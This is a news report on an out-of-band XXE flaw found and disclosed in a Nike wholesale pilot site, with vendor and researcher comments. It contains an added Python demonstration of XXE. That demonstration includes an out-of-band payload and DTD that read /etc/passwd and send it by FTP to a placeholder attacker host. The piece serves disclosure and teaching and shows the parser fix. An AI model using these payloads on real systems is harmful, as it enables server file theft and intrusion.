A previously undisclosed vulnerability in Nike’s website allowed anyone with a few lines of code to read files on the server, such as its list of user accounts, which could have provided greater access to the company’s private systems.
Security researcher Corben Leo discovered the flaw late last year and contacted Nike through the company’s dedicated email address for reporting security vulnerabilities, which it advertises on its bug bounty page. After Nike did not respond for more than three months, Leo contacted a cyber security news site, which also alerted the company to the vulnerability.
The bug was an out-of-band XML external entity (OOB-XXE) injection flaw in how Nike’s website parsed XML input: the parser honored external entity declarations supplied in a user-controlled document, allowing the researcher to read files directly on the server. The out-of-band variant is used when the parser’s output is never reflected back to the attacker; the file contents are instead sent to a host the attacker controls. OOB-XXE attacks are widely seen as harder to carry out than plain XXE, but they can be used to gain deep access to a server’s internals. Reading a server’s files can disclose other avenues for exploitation, such as credentials or configuration that lead to remote code execution, or pivoting to other connected servers or databases.
The exploit code, just over a dozen lines of Python, let Leo capture data stored on a Nike.com subdomain by sending it to an external FTP server he operated, which received the file’s contents line by line. A video of the exploit in action revealed the contents of the server’s passwd file, which lists every account on the system, including those of system administrators.
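To make the mechanism concrete, here is an added example; it is not Leo’s PoC (which was not published) and not Nike’s code. It models a small order-processing endpoint built on Python’s xml.sax/expat parser and parses the same attacker-supplied document twice: once with external entity resolution turned on, which is the vulnerable setting, and once with it off. The payload reads a constructed stand-in for /etc/passwd through an external entity. A second helper builds the out-of-band payload shape (the document plus the DTD the attacker serves) with a placeholder attacker hostname; that payload is only constructed here, never sent. The element names, file contents and hostnames are all assumptions made for the example.

```python
"""In-band XXE against Python's xml.sax (expat) next to the hardened setting,
plus the shape of the out-of-band payload. Added illustration, not the PoC."""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for /etc/passwd; not data from any real server.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "sysadmin:x:1000:1000:Site admin:/home/sysadmin:/bin/bash\n"
)


class OrderHandler(ContentHandler):
    """Collects the text of <notes>, as an app that stores and echoes
    user-supplied text would (that echo is what makes in-band XXE visible)."""

    def __init__(self):
        super().__init__()
        self._in_notes = False
        self._chunks = []

    def startElement(self, name, attrs):
        if name == "notes":
            self._in_notes = True

    def endElement(self, name):
        if name == "notes":
            self._in_notes = False

    def characters(self, content):
        if self._in_notes:
            self._chunks.append(content)

    @property
    def notes(self):
        return "".join(self._chunks)


def parse_order(xml_bytes, resolve_external_entities):
    """Parse an <order> document and return its <notes> text.

    resolve_external_entities=True reproduces the vulnerable configuration
    (feature_external_ges on). False is the fix: expat still parses the
    entity declaration, but the reference expands to nothing."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = OrderHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.notes


def inband_xxe_payload(file_uri):
    """External general entity pointing at a local file, referenced where the
    application reflects user text back (element names are assumptions)."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "{file_uri}"> ]>\n'
        "<order><id>1</id><notes>&xxe;</notes></order>"
    ).encode()


def oob_xxe_payload(attacker_host):
    """Out-of-band variant for when nothing is reflected. The document pulls a
    DTD from the attacker; that DTD declares an entity whose URL embeds the
    target file, so resolving it makes the server connect to
    ftp://<attacker>/<file contents>. An FTP listener treats each newline as
    a new command, which is why the file arrives one line at a time.
    attacker_host is a placeholder. Returns (xml document, dtd served)."""
    xml_doc = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY % remote SYSTEM "http://{attacker_host}/evil.dtd">\n'
        "  %remote;\n"
        "  %exfil;\n"
        "]>\n"
        "<order><notes>hello</notes></order>"
    )
    # Nested parameter-entity declaration must live in the external DTD;
    # the XML spec forbids it inside the internal subset.
    evil_dtd = (
        '<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
        "<!ENTITY % wrap \"<!ENTITY &#x25; exfil SYSTEM "
        f"'ftp://{attacker_host}/%file;'>\">\n"
        "%wrap;\n"
    )
    return xml_doc, evil_dtd


def demo_local_file_read():
    """Write FAKE_PASSWD to a temp file, then parse one payload with the
    vulnerable and the hardened parser. Returns (leaked, blocked)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(FAKE_PASSWD)
        path = f.name
    try:
        payload = inband_xxe_payload(Path(path).as_uri())
        leaked = parse_order(payload, resolve_external_entities=True)
        blocked = parse_order(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo_local_file_read()
    print("vulnerable parser returned:\n" + leaked)
    print("hardened parser returned: %r" % blocked)
```

The fix is the parser setting, not the site: leaving `feature_external_ges` off (the default since Python 3.7.1) or using a hardened wrapper such as defusedxml stops both the in-band and the out-of-band form, because the out-of-band DTD fetch is itself an external entity resolution.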
A Nike spokesperson confirmed the flaw is now fixed, but downplayed any risk to other systems. “MyNikeTeam.com site was a pilot site that was active for a few months last year and was hosted on a separate server to the main Nike.com site. It has now been retired to address this issue. We appreciate any notification that helps us maintain data security,” the spokesperson said.
Nike isn’t just a sports apparel retail giant. In the past few years, the company has been aggressively pushing into the data-gathering market by building sports and activity tracking into its products, as well as creating its own line of wearables, a market it has since exited, though it still integrates its technology with other brands’ wearables.
A Nike spokesperson said the site was designed for wholesale customers rather than ordinary consumers, but it still allowed users to log in with their Nike.com username and password. Nike said its micro-service architecture and server setup meant user data was never put at risk by the bug.
A video and proof-of-concept (PoC) code were passed to Scott Helme, a UK-based security researcher and consultant, to independently review.
“The issue here is pretty severe and the researcher found a very nice OOB-XXE injection vulnerability,” said Helme. “As can be seen in the demo video, the PoC extracted the contents of the passwd file on the host and sent them to a remote server under the control of the researcher, proving the vulnerability is valid and that data can be exfiltrated from the host.”
“The response from Nike was to take the affected site offline but this doesn’t address the concerns around any data that was processed and the access to other internal systems that an attacker would have had,” Helme added.
“With a login form on the page it’s more than reasonable to assume that credentials were processed on the affected site whilst this vulnerability was present,” he said. “Also, an attacker could have leveraged it to probe other systems and services adjacent to, or accessible from, this particular host.”